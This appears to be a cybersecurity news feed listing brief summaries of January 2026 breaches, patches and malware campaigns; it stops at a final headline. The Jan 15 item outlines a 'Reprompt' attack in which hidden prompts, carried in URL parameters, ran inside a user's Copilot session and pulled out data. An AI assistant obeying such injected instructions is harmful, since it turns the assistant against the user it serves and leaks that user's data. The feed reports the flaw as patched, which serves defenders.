JumpCloud has introduced a suite of AI-powered capabilities for its identity and access management (IAM) platform, designed to help organizations manage the security risks of modern AI adoption. The new features focus on discovering and governing 'shadow AI'—the unsanctioned use of AI tools by employees—and applying Zero Trust principles to manage access for non-human autonomous agents. The goal is to provide IT and security teams with the visibility and control needed to turn a potential liability into a secure source of productivity.

Jan 17, 20263 min read

Acronis Debuts S3-Compatible Archival Storage for MSPs with Predictable Pricing

Acronis has launched Acronis Archival Storage, a new long-term, S3-compatible cold storage solution aimed at Managed Service Providers (MSPs) and their SMB clients. Powered by Seagate's Lyve Cloud, the service is integrated into the Acronis Cyber Protect Cloud platform and features a predictable pricing model with no egress or API fees. This addresses a key need for compliant, cost-effective data retention for large volumes of infrequently accessed data, offering WORM immutability and high durability.

Jan 17, 20263 min read

Armis Revamps Channel Strategy with Flexible, Tier-Free 'Select Partner Program'

Armis, a leader in cyber exposure management, has launched its new Armis Select Partner Program. The revamped global channel initiative moves away from traditional, rigid tiers in favor of a flexible, three-route model: selling, delivering services, and building solutions. This approach allows partners to engage with Armis in a way that best suits their business model, aiming to accelerate the adoption of the Armis Centrix platform and build a more collaborative partner ecosystem.

Jan 17, 20262 min read

Darktrace Hires Terry Doyle as First Chief Information Officer to Scale Enterprise IT

AI cybersecurity leader Darktrace has appointed Terry Doyle as its first-ever Chief Information Officer (CIO). Doyle, a veteran technology executive with nearly 30 years of experience, will join the executive committee and be responsible for consolidating the company's enterprise IT and data functions. This strategic hire aims to build enterprise-scale systems and processes to support Darktrace's rapid global growth and enhance its operational discipline.

Jan 17, 20262 min read

AWS Patches 'CodeBreach' Flaw, Averting Massive GitHub Supply Chain Attack

Amazon Web Services (AWS) has remediated a critical vulnerability in its AWS CodeBuild service, dubbed 'CodeBreach' by Wiz researchers. The flaw, which stemmed from a misconfigured webhook filter, could have allowed unauthenticated attackers to inject malicious code into the build processes of major open-source projects, including the AWS JavaScript SDK. An exploit could have granted attackers administrative control over key GitHub repositories, creating a catastrophic supply chain risk for the millions of applications and cloud environments that depend on these libraries. The vulnerability was discovered following a separate, failed attack attempt, highlighting the real-world threat. AWS has since patched the issue and implemented global hardening measures.

Jan 16, 20267 min read

Hacker Group 'HawkSec' Claims Breach of 184 Million TotalEnergies Records

A hacking group calling itself 'HawkSec' has claimed a massive data breach against the French energy supermajor, TotalEnergies. In a post on a data leak forum, the group alleged the theft of a database containing nearly 184 million records, including sensitive customer information such as names, email addresses, phone numbers, and bank account details for French customers. To substantiate their claims, HawkSec posted sample data on social media. However, the full extent and legitimacy of the breach remain unverified. TotalEnergies has not yet confirmed the incident. The group's erratic behavior on forums has led some researchers to question their experience, though the potential impact if the claims are true is significant.

Jan 16, 20266 min read

Critical Flaw in WordPress Plugin 'Modular DS' Actively Exploited for Admin Takeover

A critical, unauthenticated privilege escalation vulnerability in the 'Modular DS' WordPress plugin is being actively exploited in the wild. The flaw, tracked as CVE-2026-23550 with a CVSS score of 10.0, affects over 40,000 websites. It allows attackers to bypass authentication and gain full administrator privileges by sending a specially crafted HTTP request. Security firm Patchstack, which discovered the exploitation, observed attackers creating rogue admin accounts named 'PoC Admin'. The vulnerability lies in the plugin's custom routing and login logic, which can be tricked into logging an unauthenticated user into an existing administrator account. The vendor released a patch in version 2.5.2, and all users are urged to update immediately.

Jan 16, 20266 min read

Palo Alto Networks Patches High-Severity DoS Flaw in PAN-OS Firewalls

Palo Alto Networks has issued security updates to address a high-severity denial-of-service (DoS) vulnerability, CVE-2026-0227, in its PAN-OS software. The flaw, which has a CVSS score of 7.7, allows an unauthenticated, remote attacker to crash firewalls that have a GlobalProtect gateway or portal enabled. A successful exploit forces the device into maintenance mode, disrupting all network traffic. While Palo Alto Networks is not aware of active exploitation, a proof-of-concept (PoC) exploit reportedly exists. The vulnerability affects multiple versions of PAN-OS, and customers are urged to apply the patches as soon as possible, as there are no workarounds.

Jan 16, 20265 min read

GlassWorm Malware Pivots to Attack macOS Developers via Malicious VS Code Extensions

The GlassWorm malware campaign has evolved, now specifically targeting macOS developers through malicious extensions for Visual Studio Code and OpenVSX. This new wave of attacks, detailed in a security digest from Acronis, uses a self-propagating worm to deliver its payload. The malware embeds an encrypted payload within JavaScript files, uses a 15-minute execution delay to evade sandboxes, and establishes persistence using LaunchAgents. The primary goal of GlassWorm is to steal a wide range of developer-centric data, including credentials for GitHub and npm, browser data, and information from over 50 different cryptocurrency wallets, highlighting a significant supply chain threat.

Jan 16, 20266 min read

Central Maine Healthcare Breach Exposes Data of Over 145,000 Patients and Employees

Central Maine Healthcare (CMH) has disclosed a major data breach affecting 145,381 patients and employees. The incident involved an unauthorized third party maintaining access to its network for over two months, from March to June 2025. The compromised data includes highly sensitive personal, medical, and financial information, such as Social Security numbers and treatment details. CMH is offering complimentary credit monitoring services to those affected and has stated it is enhancing its security monitoring to prevent future incidents.

Jan 15, 20265 min read

Massive Unsecured Database Leaks Personal, Health, and Financial Data of 45 Million French Citizens

Security researchers have discovered a massive, unprotected database on a cloud server containing the sensitive records of approximately 45 million French citizens. The data, which has since been secured, appears to be an aggregation from at least five separate breaches, compiled by a data broker or cybercriminal. The exposed archive included voter registration data, healthcare records, IBANs, and CRM contact information, creating comprehensive and dangerous profiles on a significant portion of the French population.

Jan 15, 20266 min read

VoidLink: New Modular Linux Malware Framework Discovered Targeting Cloud and Container Environments

Security researchers at Check Point have discovered 'VoidLink,' a highly sophisticated and modular Linux malware framework. Written in the modern Zig programming language, VoidLink is purpose-built for espionage in cloud and containerized environments. It can detect if it's running in AWS, GCP, Azure, Kubernetes, or Docker and adapt its behavior. With a plugin-based architecture inspired by Cobalt Strike, it features advanced rootkit capabilities, an in-memory plugin system, and tools for credential theft from cloud services and Git repositories. Though not yet seen in the wild, its advanced design poses a significant future threat.

Jan 15, 20267 min read

Microsoft Copilot Flaw Allowed Data Theft via "Reprompt" Session Hijacking Attack

Researchers discovered a significant vulnerability in Microsoft's Copilot AI assistant that allowed for a "Reprompt" attack, enabling threat actors to bypass safety features, hijack user sessions, and exfiltrate data. The flaw, which has been patched in the January 2026 security update, abused URL parameters to inject hidden, follow-up prompts that executed within the victim's authenticated session. This allowed attackers to chain commands and steal information without the user's knowledge, highlighting the security risks of AI assistants processing untrusted input.

Jan 15, 20265 min read

CISA Mandates Patch for Exploited Windows Zero-Day Used in Attack Chains

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch a zero-day vulnerability in the Windows Desktop Window Manager (CVE-2026-20805) by February 3, 2026. The medium-severity information disclosure flaw is being actively exploited in the wild as a crucial component in multi-stage attack chains, allowing attackers to bypass Address Space Layout Randomization (ASLR) and enable more severe exploits like remote code execution. The flaw was addressed in Microsoft's January 2026 Patch Tuesday update.

Jan 14, 20265 min read

Spanish Energy Giant Endesa Hit by Massive Data Breach, 20M Records Allegedly For Sale

Spain's largest electric utility, Endesa, has confirmed a data breach after detecting unauthorized access to a commercial platform. The company admitted that customer PII, contact details, and bank account IBANs were potentially exposed. The situation is amplified by a threat actor on a cybercrime forum who claims to have stolen a 1.05 TB database containing the data of over 20 million people, which is now up for sale. Endesa, which serves over 10 million customers, is urging vigilance against phishing and fraud.

Jan 14, 20265 min read

Pax8 Data Leak Exposes Sensitive MSP and Customer Info via Accidental Email

Cloud commerce marketplace Pax8 has confirmed a data exposure incident caused by human error. On January 13, an employee mistakenly sent an email containing a CSV file with sensitive, non-PII business data for approximately 1,800 Managed Service Provider (MSP) partners. The email, sent to fewer than 40 UK-based partners, exposed valuable information such as customer names, Microsoft license counts, pricing, and contract renewal dates, creating a significant risk of targeted phishing and competitive poaching.

Jan 14, 20265 min read

CISA Warns of Critical Flaws in Rockwell & YoSmart ICS Equipment

CISA has released several Industrial Control Systems (ICS) advisories, warning of significant vulnerabilities in widely deployed equipment from Rockwell Automation and YoSmart. A high-severity SQL injection flaw (CVE-2025-12807) in Rockwell's FactoryTalk platform could allow for database takeover, while another flaw (CVE-2025-9368) can cause a denial-of-service condition. Separately, multiple flaws in YoSmart smart home hubs could permit remote device control and data interception, posing risks to both manufacturing and communications sectors.

Jan 14, 20264 min read

Russian GRU Hackers (APT28) Evolve Credential-Harvesting Tactics

The Russian GRU-linked threat group BlueDelta, also known as APT28 or Fancy Bear, has been observed refining its credential-harvesting operations. According to research from Recorded Future, campaigns between February and September 2025 targeted energy, defense, and policy organizations in Europe and Eurasia. The group uses tailored spear-phishing emails, multi-stage redirection, and abuses low-cost, disposable infrastructure like ngrok and other free hosting services to enhance stealth and complicate attribution.

Jan 14, 20264 min read

Russian Hackers Target Ukrainian Military with "PluggyApe" Malware

A Russian-linked hacking group, Void Blizzard (also known as UAC-0190), has been targeting the Ukrainian Defense Forces with a new cyber-espionage campaign. According to CERT-UA, the attacks, which occurred between October and December 2025, use a novel malware strain called PluggyApe. The campaign employs sophisticated social engineering, with attackers making direct contact with targets on secure messaging apps like Signal and WhatsApp, using charity-themed lures to build trust and deliver the malware.

Jan 14, 20264 min read

ConnectPOS Exposed Admin GitHub Token for Over Four Years, Creating Massive Supply Chain Risk

Point-of-sale vendor ConnectPOS exposed a GitHub Personal Access Token (PAT) with full administrative privileges in its public documentation for over four years, from September 2021 until its discovery in January 2026. The blunder, found by security firm Sansec, put the vendor's entire software supply chain at risk. An attacker could have used the token to inject malicious code, such as a payment card skimmer, into the POS software, which would then be distributed to its 12,000+ customers, including major brands like Asus and Indiana University.

Jan 14, 20264 min read

Microsoft's January 2026 Patch Tuesday Fixes 114 Flaws, Including One Exploited Zero-Day

Microsoft has released its first Patch Tuesday of 2026, a substantial update that addresses 114 security vulnerabilities across a wide range of its products, including Windows, Office, Azure, and SharePoint. The release includes fixes for eight critical remote code execution (RCE) vulnerabilities and, most notably, one moderate-severity information disclosure zero-day (CVE-2026-20805) that is confirmed to be actively exploited in the wild. This makes it the third-largest January update on record, urging administrators to prioritize deployment.

Jan 14, 20263 min read

Ransomware Evolves: Groups Recruit Insiders, Add DDoS as Profits Fall

The ransomware landscape is undergoing a significant evolution heading into 2026. Despite a 47% surge in publicly reported attacks in 2025, analysis from Recorded Future shows that overall profits for threat actors have declined. This financial pressure is forcing a tactical shift. Key trends to watch for include the bundling of DDoS services with ransomware to increase victim coercion, a more aggressive focus on recruiting corporate insiders to gain initial access, and a notable globalization of new ransomware groups emerging outside of the traditional Russian sphere of influence.

Jan 13, 20266 min read

Urgent Patch: CISA Adds Actively Exploited Gogs RCE Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical path traversal vulnerability, CVE-2025-8110, in the Gogs self-hosted Git service to its Known Exploited Vulnerabilities (KEV) catalog. This flaw, which allows for remote code execution (RCE) via symlink manipulation, is confirmed to be actively exploited in the wild. With a CVSS score of 8.7, it bypasses a previous patch for CVE-2024-55947. Federal agencies are mandated to remediate by February 2, 2026. The vulnerability affects an estimated 1,600 internet-exposed Gogs servers, posing a significant risk to organizations using the platform for source code management.

Jan 13, 20266 min read

Poetic Justice: BreachForums Hacked, Database of 324,000 Cybercriminals Leaked

In a significant turn of events for the cybercrime community, the user database for the notorious hacking marketplace BreachForums was leaked online on January 9, 2026. The dump contains sensitive records for 323,986 users, including usernames, email addresses, IP addresses, private messages, and Argon2-hashed passwords. The breach, allegedly occurring in August 2025 and claimed by an individual named "James," represents a major operational security failure and provides a trove of intelligence for law enforcement agencies seeking to identify and prosecute threat actors like 'IntelBroker' and 'ShinyHunters' who were active on the forum.

Jan 13, 20266 min read

Oregon DEQ Kept Data Breach of 4,800 People Secret for Nine Months

The Oregon Department of Environmental Quality (DEQ) confirmed on January 13, 2026, that a cyberattack in April 2025 exposed the personal data of approximately 4,800 people. The agency opted not to issue a broad public disclosure, citing that Oregon law did not require it, and instead began sending notification letters to affected individuals in late December 2025, over eight months after the incident. The initial attack, which the Rhysida ransomware gang later claimed, caused significant operational disruption. The delay in notification has drawn criticism and raises questions about the agency's transparency and incident response process.

Jan 13, 20264 min read

French Immigration Agency Data Leaked via Third-Party Breach

France's Office for Immigration and Integration (OFII) has confirmed a data breach originating from a compromised third-party service provider. In early January 2026, a hacker claimed to be selling a database of up to 2.1 million records of foreign residents on BreachForums, posting samples that included names, contact details, and nationalities. OFII clarified that its own systems were not breached, but that the attack targeted a private training provider responsible for mandatory integration courses. The incident highlights the significant risks of supply chain attacks for government agencies and could lead to GDPR penalties for OFII as the data controller.

Jan 13, 20264 min read

G7 Urges Financial Sector to Prepare for Quantum Computing Threat

The G7 Cyber Expert Group (CEG), co-chaired by the U.S. Department of the Treasury and the Bank of England, has issued a public statement and roadmap advising the global financial sector to begin a coordinated transition to quantum-resilient technology. The guidance warns that advanced quantum computers will eventually be able to break the public-key cryptography that secures the world's financial transactions. The roadmap encourages financial institutions to start assessing their quantum risks and developing formal plans for migrating to post-quantum cryptography (PQC) standards, such as those being developed by NIST, to counter 'harvest now, decrypt later' attacks.

Jan 12, 20265 min read

Supply Chain Attack: Malicious npm Packages Steal Credentials from n8n Automation Platform

A novel supply chain attack discovered by Endor Labs is targeting users of the n8n workflow automation platform. Attackers are publishing malicious packages to the npm registry, disguised as legitimate 'community nodes' for popular services. When an unsuspecting user installs one of these nodes and enters their credentials (e.g., OAuth tokens, API keys), the malicious code exfiltrates the entire credential store from the n8n instance to an attacker-controlled server. This gives the attackers access to all services connected to the victim's n8n workflows, such as Salesforce and Stripe, creating a significant risk of widespread data breaches and financial fraud.

Jan 12, 20265 min read

Cyber-Fraud Now Top Global Threat, Surpassing Ransomware, WEF Report Finds

The World Economic Forum's (WEF) 'Global Cybersecurity Outlook 2026' report, produced with Accenture, reveals a major shift in the threat landscape: cyber-enabled fraud and phishing have now surpassed ransomware as the top concern for global business leaders. The report highlights that fraud has reached 'record highs,' with 77% of leaders reporting an increase. It also identifies Artificial Intelligence as the most consequential force shaping cybersecurity in 2026, with 94% of leaders agreeing it will be the biggest factor. AI is seen as a double-edged sword, accelerating both offensive capabilities and defensive solutions, while growing concerns about data leaks from generative AI persist.

Jan 12, 20265 min read

GoBruteforcer Botnet Exploits Weak Credentials on Linux Servers to Target Crypto Wallets

A modular Go-based botnet named GoBruteforcer is actively compromising internet-facing Linux servers by brute-forcing weak credentials for services like FTP, MySQL, and PostgreSQL. According to Check Point Research, the campaign's success is fueled by the widespread use of default or weak passwords, often found in AI-generated server deployment examples. Once compromised, servers are added to an IRC-controlled botnet and used to scan for more victims. The attackers have a clear financial motive, as they have been observed deploying tools on compromised hosts to scan for and drain TRON and Binance Smart Chain cryptocurrency wallets.

Jan 12, 20265 min read

High-Severity Code Injection Flaw in Open WebUI (CVE-2025-64496) Allows RCE

A high-severity vulnerability, tracked as CVE-2025-64496, has been discovered in Open WebUI, a popular self-hosted interface for large language models (LLMs). The flaw, found by Cato Networks, allows a malicious AI server to inject arbitrary JavaScript code into a user's browser session. This can be exploited to steal authentication tokens and take over the user's account. If the compromised user has specific permissions enabled, the vulnerability can be escalated to achieve full remote code execution (RCE) on the host server. The issue affects Open WebUI versions 0.6.34 and older and was patched in version 0.6.35.

Jan 12, 20265 min read

Iran's MuddyWater APT Unveils 'RustyWater' RAT in Middle East Espionage

The Iranian state-sponsored advanced persistent threat (APT) group MuddyWater, also known as Mango Sandstorm and TA450, has been observed deploying a new, custom-built Remote Access Trojan (RAT) named 'RustyWater'. According to research from CloudSEK, this new implant, written in the Rust programming language, is being used in a spear-phishing campaign targeting diplomatic, maritime, financial, and telecom entities across the Middle East. The shift to a Rust-based tool marks a significant evolution in the group's capabilities, aimed at enhancing stealth and evading detection during long-term espionage operations.

Jan 11, 20266 min read

Qilin Ransomware Hits French Infra Giant Bouygues, Claims 80GB Data Theft

The prolific Qilin ransomware group has listed French multinational infrastructure firm Bouygues Energies & Services as its latest victim on its dark web leak site. The group claims to have exfiltrated 80 GB of highly sensitive data, comprising 31,000 files. Most alarmingly, the threat actors allege the stolen data includes documents related to industrial control systems (ICS), such as SCADA interfaces and network plans for critical infrastructure projects like tunnels and tramways. This attack highlights the severe risk ransomware poses to physical safety and national security, extending beyond simple data encryption.

Jan 11, 20266 min read

Apex Legends 'Remote Control' Hack Patched After Streamers Hijacked

Respawn Entertainment, the developer of the popular battle royale game Apex Legends, rapidly deployed a patch on January 10, 2026, to fix a significant security exploit. The vulnerability allowed a malicious actor to remotely take control of other players' characters during a live match, an incident that affected several high-profile streamers. The developer was quick to reassure the community that the exploit was not a Remote Code Execution (RCE) vulnerability, meaning attackers could not execute malicious code on victims' computers. The issue was resolved within a day of being publicly acknowledged.

Jan 11, 20264 min read

Everest Ransomware Claims 900 GB Data Theft from Nissan

The Everest ransomware group has claimed a massive data breach against Japanese automotive giant Nissan Motor Co., Ltd. In a post on its dark web leak site on January 10, 2026, the group alleged it had stolen approximately 900 GB of sensitive corporate data. To back up its claim, Everest published screenshots showing internal directory structures and file names related to dealerships, finance, and audits. The group, which employs a double-extortion model, has given Nissan a five-day deadline to respond before it threatens to release the data publicly. Nissan has not yet officially confirmed the breach.

Jan 11, 20266 min read

High-Severity Flaw in Mailpit Dev Tool Allows Email Interception

A high-severity vulnerability, tracked as CVE-2026-22689, has been discovered in Mailpit, a popular email testing tool for developers. The flaw is a Cross-Site WebSocket Hijacking (CSWSH) issue affecting all versions prior to 1.28.2. It allows a remote attacker to intercept sensitive data, including the full content of test emails, by tricking a developer running a vulnerable Mailpit instance into visiting a specially crafted malicious website. Users are strongly urged to upgrade to the patched version to mitigate the risk of data exposure.

Jan 11, 20265 min read

French Bank Customers Hit by 'Quishing' Scam Using Fake Physical Cards

A highly deceptive phishing campaign, dubbed 'quishing,' is targeting bank customers in France using a blend of physical and digital tactics. Scammers are sending official-looking letters by postal mail that contain a high-quality counterfeit bank card. The letter instructs the recipient to 'activate' the new card by scanning an included QR code. This QR code directs the victim to a fraudulent website designed to mimic their bank's portal, where their banking credentials and personal information are harvested. This hybrid attack method is effective at bypassing traditional email security filters.

Jan 11, 20264 min read

Texas Health System Breach Exposes Data of Over 34,000 Patients

Vida Y Salud Health Systems Inc., a nonprofit health center serving rural communities in South Texas, has reported a data breach that exposed the sensitive personal and medical information of 34,504 patients. The organization detected unauthorized access to its network in October 2025, where an attacker copied files containing names, Social Security numbers, driver's license numbers, and protected health information (PHI). Vida Y Salud is notifying affected individuals and offering complimentary credit monitoring services as law firms begin to investigate the incident.

Jan 11, 20265 min read

Financial Sector Warned of Systemic Supply Chain Risk and 'Indirect Ransomware'

A new threat intelligence report for 2025-2026 reveals a perilous cyber landscape for the financial sector, dominated by systemic supply chain risks and evolving ransomware tactics. Citing data that 97% of U.S. banks were breached via third-party suppliers in 2024, the report underscores the critical vulnerability posed by partners. It also highlights the rise of 'indirect ransomware,' where attackers compromise a supplier to bypass a bank's defenses. Geopolitical threats also persist, with pro-Russian hacktivists targeting European banks and the North Korean Lazarus Group remaining a primary state-aligned threat.

Jan 11, 20265 min read

YARA-X Update Helps Analysts Avoid Flawed Detection Rules

Version 1.11.0 of YARA-X, a popular tool for malware analysis, has been released with a key enhancement aimed at improving the accuracy of detection rules. The update introduces 'hash function warnings,' a feature that alerts security analysts when they make common errors in hash string comparisons, such as providing a SHA1 hash where a SHA256 hash is expected. This quality-of-life improvement helps prevent silent false negatives, where a flawed rule fails to detect malware without providing any error, thereby strengthening threat hunting and security operations.

Jan 11, 20263 min read

Chinese State Hackers 'Salt Typhoon' Breach U.S. Congressional Committee Emails

The Chinese state-sponsored hacking group known as Salt Typhoon has reportedly compromised the email systems of staff members for several key U.S. House of Representatives committees. The cyberespionage campaign, detected in December 2025, targeted aides on influential panels including those overseeing China, foreign affairs, intelligence, and armed services. While lawmakers' personal accounts are not believed to have been accessed, the infiltration of staff networks raises significant national security concerns about the potential for long-term intelligence gathering from sensitive, unclassified communications. Salt Typhoon is a known actor with a history of targeting U.S. critical infrastructure.

Jan 10, 20266 min read

Cisco Patches Medium-Severity Flaws in Snort 3 Engine That Could Lead to DoS and Data Leaks

Cisco has disclosed two medium-severity vulnerabilities, CVE-2026-20026 and CVE-2026-20027, in its widely used Snort 3 detection engine. The flaws exist in the processing of DCE/RPC traffic and can be triggered by a remote, unauthenticated attacker. CVE-2026-20026 (CVSS 5.8) is a use-after-free issue that could cause the engine to crash, leading to a denial-of-service. CVE-2026-20027 (CVSS 5.3) is an out-of-bounds read that could leak sensitive memory data. The vulnerabilities affect numerous Cisco products, including Secure Firewall, IOS XE with UTD, and Meraki MX appliances. Patches are available for some products, but others are pending.

Jan 10, 20265 min read

Google Patches High-Severity Chrome Flaw That Could Allow Attackers to Bypass Security Policies

Google has issued a security update for its Chrome browser, patching a high-severity vulnerability tracked as CVE-2026-0628. The flaw, which affects Chrome on Windows, macOS, and Linux, is described as an "insufficient policy enforcement" issue within the WebView component. An attacker could exploit this by tricking a user into installing a malicious extension, which could then bypass security controls to execute unauthorized code on normally protected browser pages. This could lead to data theft or session hijacking. While there is no evidence of active exploitation, Google urges all users to update to the patched versions immediately.

Jan 10, 20265 min read

Online Betting Giant BetVictor Discloses Major Data Breach, Customer Data Compromised

BetVictor, a major European online gambling company, has officially disclosed a significant data breach that compromised sensitive customer information. The security incident was first detected on January 8, 2026, during routine security audits and has caused unspecified operational disruptions. The company has not yet detailed the nature of the attack or the exact types of data accessed. An investigation is underway as BetVictor works to secure its systems and manage the fallout, which could include regulatory scrutiny and a loss of customer trust in the highly competitive online gaming market.

Jan 10, 20265 min read

Data of 17.5 Million Instagram Users Leaked on Hacker Forum After Scraping Attack

The personal data of approximately 17.5 million Instagram users has been leaked on the BreachForums hacking forum. The data, posted by a user named 'Solonik,' was allegedly obtained via automated data scraping from public APIs. The leaked information includes full names, email addresses, phone numbers, and user IDs, exposing the affected individuals to a high risk of targeted phishing, identity theft, and SIM swapping attacks. Following the leak, users have reported a surge in fraudulent password reset attempts. As of January 10, 2026, Instagram's parent company, Meta, has not formally acknowledged the incident.

Jan 10, 20266 min read

Critical OpenSSH Flaw Exposes Moxa Industrial Switches to Remote Code Execution

Industrial networking vendor Moxa has issued a security advisory for a critical vulnerability, CVE-2023-38408, affecting its EDS-G4000 and RKS-G4000 series industrial Ethernet switches. The flaw resides in the OpenSSH service integrated into the device firmware and could allow a remote attacker to execute arbitrary code. These switches are commonly used in critical infrastructure and industrial control systems (ICS), making the vulnerability particularly high-risk. The Canadian Centre for Cyber Security has echoed the warning, and both organizations are urging administrators to apply the provided firmware updates immediately to mitigate the threat.

Jan 10, 20265 min read

HPE OneView Flaw Scores Perfect 10.0, Grants Attackers 'Keys to the Kingdom'

Hewlett Packard Enterprise (HPE) has disclosed CVE-2025-37164, a critical unauthenticated remote code execution vulnerability in its OneView infrastructure management software. The flaw, rated with a maximum CVSS score of 10.0, allows a remote attacker to gain complete control of the centralized management appliance without any credentials. Given OneView's extensive privileges over servers, storage, and firmware, a successful exploit could lead to a catastrophic compromise of an organization's entire infrastructure. CISA has added the vulnerability to its KEV catalog, mandating immediate patching for federal agencies.

Jan 9, 20265 min read

FBI: North Korea's Kimsuky APT Using 'Quishing' to Bypass MFA

The U.S. Federal Bureau of Investigation (FBI) has issued a formal advisory warning that the North Korean state-sponsored threat group Kimsuky (also known as APT43) is actively using malicious QR codes in spear-phishing emails. This tactic, dubbed 'quishing,' is designed to bypass traditional email security by tricking users into scanning the code with a personal mobile device. The goal is to harvest credentials and session tokens from high-value targets in government, academic institutions, and think tanks, effectively bypassing multi-factor authentication (MFA) through session hijacking.

Jan 9, 20266 min read

London Councils Hit by Major Cyberattack, Resident Data Exposed

A significant cyberattack targeting a shared IT system used by multiple London councils has resulted in a data breach exposing the sensitive personal information of thousands of residents. The incident, which affected Kensington and Chelsea Council among others, has caused widespread service disruptions and has triggered an investigation by the UK's National Cyber Security Centre (NCSC) and the Metropolitan Police. The attack highlights the systemic risks associated with interconnected IT platforms in the public sector, where a single point of failure can have cascading consequences.

Jan 9, 20265 min read

Critical 9.8 CVSS RCE Flaw Hits Trend Micro Apex Central

Trend Micro has released patches for multiple vulnerabilities in its on-premise Apex Central security management console, including a critical remote code execution (RCE) flaw, CVE-2025-69258, with a CVSS score of 9.8. The vulnerability allows an unauthenticated remote attacker to load a malicious DLL and execute code with SYSTEM-level privileges. The flaw resides in the 'MsgReceiver.exe' component listening on TCP port 20001. Two other high-severity denial-of-service flaws were also fixed. Customers are urged to update to Build 7190 or later.

Jan 9, 20265 min read

Qilin Ransomware Gang Claims Attack on Italian Manufacturer Cressi

The prolific Russia-linked Qilin ransomware gang has claimed responsibility for a cyberattack on Cressi, a major Italian manufacturer of diving and water sports equipment. The claim was posted on the group's darknet leak site. As of January 9, 2026, the gang has not leaked any stolen data or set a public ransom deadline, which is a common extortion tactic. Cressi has not yet commented on the allegation. The Qilin group is one of the most active ransomware operations, known for targeting manufacturing and healthcare sectors and for its high-profile attacks in 2025.

Jan 9, 20264 min read

CISA Issues Six New Advisories for Hitachi and Mitsubishi ICS Flaws

On January 8, 2026, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released six new Industrial Control Systems (ICS) advisories. The alerts detail vulnerabilities discovered in products from Hitachi Energy and Mitsubishi Electric. These products, including the Hitachi Energy Asset Suite and Mitsubishi Electric's ICONICS Digital Solutions, are widely deployed across multiple critical infrastructure sectors, with a specific mention of the Energy sector. CISA is urging organizations using this equipment to review the advisories and remediate the flaws to prevent potential disruption of industrial processes.

Jan 9, 20264 min read

Cisco Patches Zero-Day Information Disclosure Flaw in ISE Platform

Cisco has patched a high-severity zero-day vulnerability, CVE-2026-20029, in its Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). The flaw could allow an authenticated, remote administrator to read arbitrary files from the underlying system. The vulnerability is due to improper parsing of XML in the web-based management interface. An attacker could exploit it by uploading a malicious file. Cisco has released software updates to address the issue and urges customers to apply them promptly to prevent sensitive data exposure.

Jan 9, 20264 min read

Cyberattacks on Automotive and Logistics Supply Chains Skyrocket

A new report from Everstream Analytics reveals a dramatic escalation in cyberattacks targeting global supply chains. In 2025, the automotive manufacturing industry experienced a staggering 722% increase in cyber incidents compared to the previous year. The logistics industry was also heavily impacted, with attacks growing by 61%. The report identifies this surge in cyber warfare as a primary factor set to disrupt trade and logistics in 2026, alongside hybrid warfare, aging infrastructure, and the weaponization of trade regulations. This transforms supply chain risk from a cost issue to a major security challenge.

Jan 9, 20264 min read

NZ Patient Portal Breach Exposes Health Records of 126,000

ManageMyHealth, New Zealand's largest online patient portal, has confirmed a significant data breach discovered on December 30, 2025. The cyberattack compromised the 'My Health Documents' module, exposing the sensitive medical records of between 108,000 and 126,000 users. A threat actor using the alias 'Kazu' has claimed responsibility, alleging the exfiltration of 108 gigabytes of data and issuing a ransom demand. Compromised information includes clinical notes, lab results, and hospital discharge summaries. ManageMyHealth has engaged cybersecurity specialists, notified authorities including the Office of the Privacy Commissioner, and obtained a High Court injunction to prevent the stolen data's distribution.

Jan 8, 20265 min read

State-Sponsored "BRICKSTORM" Backdoor Targets VMware and Windows in Critical Infrastructure

CISA, the NSA, and the Canadian Centre for Cyber Security have released an updated report on BRICKSTORM, a sophisticated backdoor malware. The report links the malware to Chinese state-sponsored threat actors who are using it to compromise VMware vSphere and Windows environments, primarily within public sector and critical infrastructure organizations. BRICKSTORM is designed for long-term persistence, credential theft, and data exfiltration, posing a significant espionage threat to enterprise virtualization platforms.

Jan 8, 20266 min read

Zero-Day in End-of-Life D-Link Routers Actively Exploited; No Patch Will Be Released

A critical zero-day command injection vulnerability, CVE-2026-0625, is being actively exploited in the wild, affecting multiple end-of-life (EOL) D-Link DSL router models. The flaw, rated 9.3 on the CVSS scale, allows unauthenticated remote attackers to execute arbitrary code by sending a malicious request to the 'dnscfg.cgi' endpoint. Exploitation has been observed since at least November 2025, with attackers using it for 'DNSChanger' style attacks. D-Link has confirmed the vulnerability but stated that since the affected products are discontinued, no security patches will be issued. Owners are strongly advised to immediately retire and replace the vulnerable devices to prevent compromise.

Jan 8, 20264 min read

Black Cat Group Targets Notepad++ Users in Massive SEO Poisoning Campaign

The notorious Black Cat (ALPHV) cybercrime group is behind a large-scale SEO poisoning campaign that uses malicious advertisements and manipulated search results to distribute an information-stealing backdoor. The campaign targets users searching for popular software like Notepad++. Victims are lured to convincing fake download sites, which redirect them to a GitHub clone to download a trojanized installer. The malware uses DLL side-loading to execute its payload, which is capable of stealing browser credentials, cookies, and keystrokes. A report from CNCERT/CC and ThreatBook revealed the campaign was highly effective, compromising nearly 278,000 hosts in China in just two weeks.

Jan 8, 20265 min read

Brightspeed Investigates Breach Claim by Crimson Collective Affecting 1M+ Customers

US fiber broadband provider Brightspeed is actively investigating a data breach claim made by the 'Crimson Collective' extortion group. The threat actors allege they have stolen a massive dataset containing the personally identifiable information (PII) of over one million customers, including names, addresses, phone numbers, and some payment data. The group, known for targeting AWS cloud environments, has threatened to leak the data if their demands are not met and has reportedly offered the dataset for sale. Brightspeed serves 20 states and has acknowledged the claim, stating it is working to determine its validity. The incident follows a pattern for Crimson Collective, which previously breached Red Hat.

Jan 8, 20265 min read

CISA Warns of RCE Flaw in Hitachi Energy ICS Product

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an Industrial Control Systems (ICS) advisory, ICSA-26-008-01, for a vulnerability in Hitachi Energy's Asset Suite. The flaw, CVE-2025-10492, could allow a remote attacker to achieve remote code execution (RCE). The vulnerability stems from an insecure third-party component, Jasper Report, used within the Asset Suite product, which is deployed in the energy sector. While there are no reports of active exploitation, CISA and Hitachi Energy are urging customers to apply mitigations and follow security best practices, such as ensuring control systems are not exposed to the internet.

Jan 8, 20264 min read

TridentLocker Ransomware Strikes Claims Giant Sedgwick in Breach-then-Encrypt Attack

